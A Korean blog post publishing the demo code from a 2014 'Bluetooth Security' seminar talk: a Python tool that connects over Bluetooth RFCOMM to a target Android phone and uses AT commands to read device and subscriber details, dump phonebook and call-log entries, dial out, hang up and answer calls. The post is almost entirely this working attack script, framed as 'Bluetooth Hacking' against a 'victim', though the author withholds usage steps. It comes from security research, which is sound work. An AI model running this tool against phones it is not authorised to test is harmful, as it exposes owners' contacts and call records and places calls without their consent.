
bluetooth를 이용한 안드로이드폰 제어

by blackcon 2014. 2. 7.

2014년 1월에 처음으로 열린 경남권 세미나에서 발표한 "Bluetooth Security"의 Demo코드를 공개하겠습니다.

블루투스를 공부하면서 스마트폰을 제어할 수 있는 코드를 작성해봤는데요.

구조는 아주 간단하니 다 보이실거에요^^

※악용의 소지가 될 수 있으므로 사용법은 공개하지 않겠습니다.

(질문 환영입니다~!! 물론 태클도 환영해요. 점프연습 많이 해둘게요 ㅋㅋ 다 피해버리겠어 +_+)

AT command : 전화 단말기나 블루투스 장치를 제어하기 위한 텍스트 명령어 (단말 펌웨어 버전이 올라가면서 막힌 명령어도 많음)

# Information

1. Language : Python 2.7.6

2. OS : Kali Linux (native install, not a virtual machine)

3. Smartphone : Samsung Galaxy S3 LTE (SHV-210S)

4. Bluetooth version

- Attacker : 4.0

- Victim : 4.0
#!/usr/bin/python
#-*-coding:utf8-*-
import bluetooth
import sys

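class Hack:
    """Drive a Bluetooth phone over one RFCOMM channel with AT commands.

    ``main`` creates a fresh instance per menu choice, and every action
    method opens the RFCOMM connection itself before sending its commands,
    so one instance carries at most one connection.  Replies are read with
    a single ``recv(1024)`` and no timeout is set, so a reply that arrives
    in several pieces (or never) is not handled.  Each action catches every
    exception and prints it as a ``[-]`` line instead of propagating it.

    Nothing here pairs or authenticates; the connect presumably relies on
    an existing bond with the target -- confirm before relying on it.
    Use only against devices you own or are authorised to test.
    """

    # Characters tolerated in a dial string; anything else is refused rather
    # than spliced into the ATD command line.
    _DIAL_CHARS = frozenset("+*#0123456789")

    def __init__(self):
        """Create the (still unconnected) RFCOMM socket and print the menu."""
        self.phoneSock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
        print('\n\n [*] Choose the number..')
        print('   [1] Get the target info')
        print('   [2] Phonebook List')
        print('   [3] Dialing')
        print('   [4] Disconnect Call')
        print('   [5] Get call')
        print('   [q] Quit')

    # ---- transport helpers -------------------------------------------

    def _connect(self, target, port):
        """Open RFCOMM channel ``port`` on the Bluetooth address ``target``."""
        self.phoneSock.connect((target, port))

    def _ask(self, command):
        """Send one AT command (CRLF appended) and return the raw reply text."""
        self.phoneSock.send(command + "\r\n")
        return self.phoneSock.recv(1024)

    # ---- reply parsing helpers ---------------------------------------

    @staticmethod
    def _quoted(reply):
        """Return the double-quoted fields of an AT reply, in order."""
        # After splitting on '"', the quoted fields sit at the odd indices.
        return reply.split('"')[1::2]

    @staticmethod
    def _payload(reply):
        """Return the text after '+CMD:' on the first non-blank reply line.

        Falls back to the whole first line (e.g. ``ERROR``) when there is
        no colon, and to ``''`` for an empty reply, so callers never index
        into a missing field.
        """
        for line in reply.splitlines():
            line = line.strip()
            if line:
                return line.split(':', 1)[1].strip() if ':' in line else line
        return ''

    @staticmethod
    def _first_quoted(reply):
        """Return the first quoted field of an AT reply, else its payload."""
        fields = Hack._quoted(reply)
        return fields[0] if fields else Hack._payload(reply)

    @staticmethod
    def _positive_int(text):
        """Parse ``text`` as a positive int; return None when it is not one."""
        try:
            value = int(text)
        except ValueError:
            return None
        return value if value > 0 else None

    # ---- actions -----------------------------------------------------

    def getInfo(self, target, port):
        """Print operator, manufacturer, model and own number of the target."""
        try:
            print(" [+] Getting the victim information...")
            self._connect(target, port)
            print(" [+] Information ")
            # +COPS: <mode>,<format>,"<operator>" -- the quoted operator name.
            print(" [=] Telecom : " + self._first_quoted(self._ask("at+cops?")))
            print(" [=] Company : " + self._payload(self._ask("at+cgmi")))
            print(" [=] Dev Model : " + self._payload(self._ask("at+cgmm")))
            # +CNUM: ,"<number>",<type> -- the quoted subscriber number.
            print(" [=] Phone number : " + self._first_quoted(self._ask("at+cnum")))
        except Exception as e:
            print(" [-] %s" % e)

    def getPhonebook(self, target, port):
        """List entries from one of the phone's storages (ME/SM/DC/RC/MC)."""
        try:
            print(" [+] Getting the book list...")
            self._connect(target, port)
            # +CPBS: ("ME","SM",...) -- the storages this phone exposes.
            reply = self._ask("AT+CPBS=?")
            supported = self._quoted(reply)
            print(" [+] Selet the mode :: " + reply.strip())
            print(' [+] ME : 저장된 번호')
            print(' [+] SM : ')
            print(' [+] DC : 발신전화')
            print(' [+] RC : 수신전화')
            print(' [+] MC : 부재중전화')
            mode = raw_input(" > ").strip().upper()
            # Only a storage the phone itself advertised is spliced into the
            # command; if the list could not be parsed, at least insist on a
            # bare alphabetic token so no CR/LF or extra command rides along.
            if supported:
                valid = mode in supported
            else:
                valid = mode.isalpha()
            if not valid:
                print(" [-] Unknown phonebook storage: %r" % mode)
                return
            # 27.007 spells this AT+CPBS="ME"; the unquoted form is kept as
            # the original sent it -- confirm on the target if it ERRORs.
            print(self._ask("AT+CPBS=" + mode))
            print(" [+] How many gets phone number?")
            count = self._positive_int(raw_input(" > "))
            if count is None:
                print(" [-] Expected a positive number of entries")
                return
            for index in range(1, count + 1):
                # +CPBR: <index>,"<number>",<type>,"<name>"
                fields = self._quoted(self._ask("AT+CPBR=%d" % index))
                number = fields[0] if fields else ''
                name = fields[1] if len(fields) > 1 else ''
                print(' [%d] %s : %s ' % (index, name, number))
        except Exception as e:
            print('[-] %s' % e)

    def DialingOut(self, target, port):
        """Place a call from the target phone to a number typed at the prompt."""
        try:
            print('[+] Connecting the target...')
            self._connect(target, port)
            print('[+] Input the phone number')
            num = raw_input(" > ").strip()
            # Refuse anything but digits and the usual dial symbols so the
            # typed text cannot carry extra AT commands into the line.
            if not num or not set(num) <= self._DIAL_CHARS:
                print('[-] Invalid phone number: %r' % num)
                return
            print('[+] Dialing...')
            # NOTE(review): 3GPP 27.007 / HFP write a voice call as
            # "ATD<number>;" (trailing ';'); the original sent it without,
            # so confirm against the target if the call does not go through.
            self._ask('ATD ' + num)
        except Exception as e:
            print('[-] %s' % e)

    def DisconnectCall(self, target, port):
        """Hang up whatever call the target phone currently has (AT+CHUP)."""
        try:
            print('[+] Connecting the target...')
            self._connect(target, port)
            print('[+] Disconnect.')
            self._ask('AT+CHUP')
        except Exception as e:
            print('[-] %s' % e)

    def GetDial(self, target, port):
        """Answer an incoming call on the target phone (ATA)."""
        try:
            print('[+] Connecting the target...')
            self._connect(target, port)
            print('[+] Get dialing...')
            self._ask('ata')
        except Exception as e:
            print('[-] %s' % e)

    def __del__(self):
        """Close the RFCOMM socket; safe on a half-built or already-closed instance."""
        sock = getattr(self, 'phoneSock', None)
        if sock is not None:
            # main() calls __del__ explicitly and the GC calls it again;
            # dropping the reference makes the second call a no-op.
            self.phoneSock = None
            sock.close()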

def logo():
    """Print the tool's ASCII banner to stdout, one row per line."""
    banner = (
        "###############################",
        "#                             #",
        "#   Bluetooth Hacking         #",
        "#                             #",
        "#             by blackcon :D  #",
        "###############################",
    )
    for row in banner:
        print(row)


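def main():
    """Parse ``[target] [port]`` from argv and run the interactive menu loop.

    ``target`` is passed through to the socket as given; ``port`` must be
    an integer RFCOMM channel.  Each menu round builds a fresh ``Hack``
    (which prints the menu and owns one socket) and releases it afterwards.
    """
    if len(sys.argv) < 3:
        print(' Usage : %s [target] [port]' % sys.argv[0])
        sys.exit(1)
    target = sys.argv[1]
    try:
        port = int(sys.argv[2])
    except ValueError:
        # Previously an unhandled ValueError traceback; report it as usage.
        print(' Usage : %s [target] [port]' % sys.argv[0])
        print(' [-] port must be an RFCOMM channel number, got %r' % sys.argv[2])
        sys.exit(1)
    logo()
    # Menu key -> unbound action; each takes (self, target, port).
    actions = {
        "1": Hack.getInfo,
        "2": Hack.getPhonebook,
        "3": Hack.DialingOut,
        "4": Hack.DisconnectCall,
        "5": Hack.GetDial,
    }
    while True:
        c = Hack()
        try:
            sel = raw_input(" >> ")
            print('')
            if sel == 'q':
                break
            action = actions.get(sel)
            if action is None:
                # The original left this message as a bare expression, so it
                # was never shown to the user.
                print("[-] Input error. Try again :D ")
            else:
                action(c, target, port)
        finally:
            # Drop the instance so its finaliser closes the RFCOMM socket
            # before the next round opens a new one.
            del c
    print(" Bye ~!! :D")


if __name__ == "__main__":
    main()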
